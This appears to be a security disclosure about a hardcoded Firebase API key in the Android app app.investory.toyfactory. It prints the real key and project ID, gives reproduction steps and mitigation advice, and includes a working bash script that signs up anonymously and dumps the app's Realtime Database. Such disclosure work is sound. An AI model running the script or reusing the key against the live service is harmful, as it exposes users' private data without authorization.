Description

In the Android application app.investory.toyfactory version 1.5.5, a hardcoded Google Firebase API key was discovered in assets/google-services-desktop.json. An attacker can extract it and use it to anonymously authenticate with Firebase Identity Toolkit. Once an anonymous user is created, the resulting ID token can be used to query the associated Firebase Realtime Database. Depending on the database security rules, this may grant unauthorized read access to sensitive user data.

Step To Reproduce

  1. Decompile the APK using jadx.
  2. Locate the Firebase API key in resources/assets/google-services-desktop.json:
{
  "project_info": {
    "project_id": "investory-27020",
    ...
  },
  "client": [
    {
     ...
      "api_key": [
        {
          "current_key": "AIzaSyCJaY1wcAEb2IiGByW3PjOHaVIuVxe4Sdk"
        }
      ]
     ...
    }
  ]
}
  1. Use the extracted API key to create an anonymous user via Firebase Identity Toolkit REST API

The response includes an idTokenrefreshToken, and localId (user ID).

  1. Use the obtained idToken as an auth parameter to access the Firebase Realtime Database.

The database security rules allow anonymous read access, the response will contain stored data.

Video Proof of Concept

poc_app_investory_toyfactory (2).gif

The script successfully obtains a Firebase idToken and retrieves the entire database content, confirming unauthorized access to sensitive user data.

Principle

Firebase API keys identify your project to Firebase services. While not designed to be secrets, they allow anyone to call Firebase Authentication endpoints to create anonymous users. The resulting ID token can then access other Firebase services like Realtime Database. If security rules are misconfigured, an attacker with the key can read or write all data accessible to anonymous users.

Mitigation

Remove hardcoded API keys from client apps. Implement strict Firebase Security Rules based on user authentication and custom claims, not just token presence. Move sensitive operations to a backend server with fine-grained access control. Limit anonymous user permissions to the minimum required, and regularly audit Firebase project settings and rules.

PoC

#!/bin/bash

API_KEY="AIzaSyCJaY1wcAEb2IiGByW3PjOHaVIuVxe4Sdk"

response=$(curl -s -X POST "<https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=$API_KEY>" \\
     -H "Content-Type: application/json" \\
     -d '{"returnSecureToken": true}')

# Extract idToken using Python
idToken=$(python3 -c "
import sys, json
try:
    data = json.loads(sys.stdin.read())
    print(data['idToken'])
except Exception as e:
    print('ERROR', e)
    sys.exit(1)
" <<< "$response")

if [[ "$idToken" == ERROR* ]]; then
    echo "Failed to obtain idToken. Response: $response"
    exit 1
fi

echo "Successfully obtained idToken: $idToken"
curl -v "<https://investory-27020.firebaseio.com/.json?auth=$idToken>"

Impact